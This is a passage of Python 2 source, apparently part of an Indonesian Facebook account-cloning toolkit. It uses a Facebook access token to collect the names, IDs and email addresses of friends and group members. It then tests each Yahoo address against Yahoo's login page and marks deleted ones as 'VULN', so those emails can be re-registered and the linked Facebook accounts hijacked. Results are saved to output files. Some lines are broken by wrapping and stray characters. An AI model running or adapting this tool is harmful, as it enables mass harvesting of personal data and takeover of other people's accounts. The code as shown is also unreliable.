       print 43*"\033[1;96m="
```

```
for w in kimak['data']:
              jml +=1
              mpsh.append(jml)
              id = w['id']
              nama = w['name']
              links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
              z = json.loads(links.text)
              try:
                     mail = z['email']
                     yahoo = re.compile(r'@.*')
                     otw = yahoo.search(mail).group()
                     if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.ya
hoo.com")
                            br._factory.is_html = True
                            br.select_form(nr=0)
                            br["username"] = mail
                            klik = br.submit().read()
                            jok =
re.compile(r"messages.ERROR_INVALID_USERNAME">.*')
                            try:
                                   pek = jok.search(klik).group()
                            except:
                                   continue
                            if "messages.ERROR_INVALID_USERNAME">' in pek:
                                    print("\033[1;96m[ ✓ ] \033[1;92mVULN")
                                   print("\033[1;96m[♣]\033[1;97mID\033[1;91m:
\033[1;92m"+id)
                                   print("\033[1;96m[♣]\033[1;97mEmail\033[1;91m:
\033[1;92m"+mail)
                                   print("\033[1;96m[♣]\033[1;97mNama\033[1;91m:
\033[1;92m"+nama)
                                   save = open('out/TemanMailVuln.txt','a')
                                   save.write("Nama: "+ nama + '\n' "ID : "+ id + '\n'
"Email: "+ mail + '\n\n')
                                   save.close()
                                   berhasil.append(mail)
              except KeyError:
                     pass
       print 42*"\033[1;96m="
       print '\033[1;96m[\033[1;97m ✓ \033[1;96m] \033[1;92mSelesai \033[1;97m....'
       print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
```

```
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m
out/TemanMailVuln.txt"
       raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
       menu()
def clone_dari_member_group():
       global toket
       os.system('clear')
       try:
              toket=open('login.txt','r').read()
       except IOError:
              print"\033[1;96m[!] \x1b[1;91mToken invalid"
              os.system('rm -rf login.txt')
              time.sleep(1)
              keluar()
       try:
              os.mkdir('out')
       except OSError:
              pass
       os.system('clear')
       print logo
       mpsh = []
       jml = 0
       print 42*"\033[1;96m="
       id=raw_input('\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m ')
       try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
              asw=json.loads(r.text)
              print"\033[1;96m[\033[1;97m ✓ \033[1;96m] \033[1;93mNama group
\033[1;91m:\033[1;97m "+asw['name']
       except KeyError:
              print"\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan"
              raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
              menu()
       jalan('\033[1;96m[*] \033[1;93mMengambil email \033[1;97m...')
       teman =
requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999998acc
ess_token='+toket)
       kimak = json.loads(teman.text)
       jalan('\033[1;96m[*] \033[1;93mStart \033[1;97m...')
       print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
       print 42*"\033[1;96m="
```

```
for w in kimak['data']:
              jml +=1
              mpsh.append(jml)
              id = w['id']
              nama = w['name']
              links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
              z = json.loads(links.text)
              try:
                     mail = z['email']
                     yahoo = re.compile(r'@.*')
                     otw = yahoo.search(mail).group()
                     if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.ya
hoo.com")
                            br._factory.is_html = True
                            br.select_form(nr=0)
                            br["username"] = mail
                            klik = br.submit().read()
                            jok =
re.compile(r"messages.ERROR_INVALID_USERNAME">.*')
                            try:
                                   pek = jok.search(klik).group()
                            except:
                                   continue
                            if "messages.ERROR_INVALID_USERNAME">' in pek:
                                    print("\033[1;96m[ ✓ ] \033[1;92mVULN")
                                    print("\033[1;96m[♣]\033[1;97mID\033[1;91m:
\033[1;92m"+id)
                                    print("\033[1;96m[♣]\033[1;97mEmail\033[1;91m:
\033[1;92m"+mail)
                                    print("\033[1;96m[♣]\033[1;97mNama\033[1;91m:
\033[1;92m"+nama)
                                   save = open('out/GrupMailVuln.txt','a')
                                   save.write("Nama : "+ nama + '\n' "ID
                                                                            : "+ id + '\n'
"Email: "+ mail + '\n\n')
                                    save.close()
                                    berhasil.append(mail)
              except KeyError:
                     pass
       print 42*"\033[1;96m="
       print '\033[1;96m[\033[1;97m ✓ \033[1;96m] \033[1;92mSelesai \033[1;97m....'
       print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
```

```
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m
out/GrupMailVuln.txt"
       raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
       menu()
def clone_dari_file():
       global toket
       os.system('clear')
       try:
              toket=open('login.txt','r').read()
       except IOError:
              print"\033[1;96m[!] \x1b[1;91mToken invalid"
              os.system('rm -rf login.txt')
              time.sleep(1)
              keluar()
       try:
              os.mkdir('out')
       except OSError:
               pass
       os.system('clear')
       print logo
       print 42*"\033[1;96m="
       files = raw_input("\033[1;96m[+] \033[1;93mNama File \033[1;91m: \033[1;97m")]
       try:
              total = open(files,"r")
              mail = total.readlines()
       except IOError:
              print"\033[1;96m[!] \x1b[1;91mFile tidak ditemukan"
              raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
              menu()
       mpsh = []
       jml = 0
       jalan('\033[1;96m[*] \033[1;93mStart \033[1;97m...')
       print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
       print 42*"\033[1;96m="
       mail = open(files,"r").readlines()
       for pw in mail:
              mail = pw.replace("\n","")
              jml +=1
              mpsh.append(jml)
              yahoo = re.compile(r'@.*')
              otw = yahoo.search(mail).group()
```

if 'yahoo.com' in otw:

```
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.ya
hoo.com")
                     br. factory.is html = True
                     br.select_form(nr=0)
                     br["username"] = mail
                     klik = br.submit().read()
                     jok = re.compile(r"messages.ERROR_INVALID_USERNAME">.*')
                     try:
                            pek = jok.search(klik).group()
                     except:
                            continue
                     if "messages.ERROR_INVALID_USERNAME">' in pek:
                            print("\033[1;96m[✓] \033[1;92mVULN")
                            print("\033[1;96m[◄] \033[1;97mEmail\033[1;91m:
\033[1;92m"+mail)
                            save = open('out/MailVuln.txt','a')
                            save.write("Email: "+ mail + '\n\n')
                            save.close()
                            berhasil.append(mail)
       print 42*"\033[1;96m="
       print '\033[1;96m[\033[1;97m ✓ \033[1;96m] \033[1;92mSelesai \033[1;97m....'
       print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
       print"\033[1;96m[+] \033[1;92mFile Tersimpan \033[1;91m:\033[1;97m
out/FileMailVuln.txt"
       raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")]
       menu()
if __name__ == '__main__':
       siapa()
```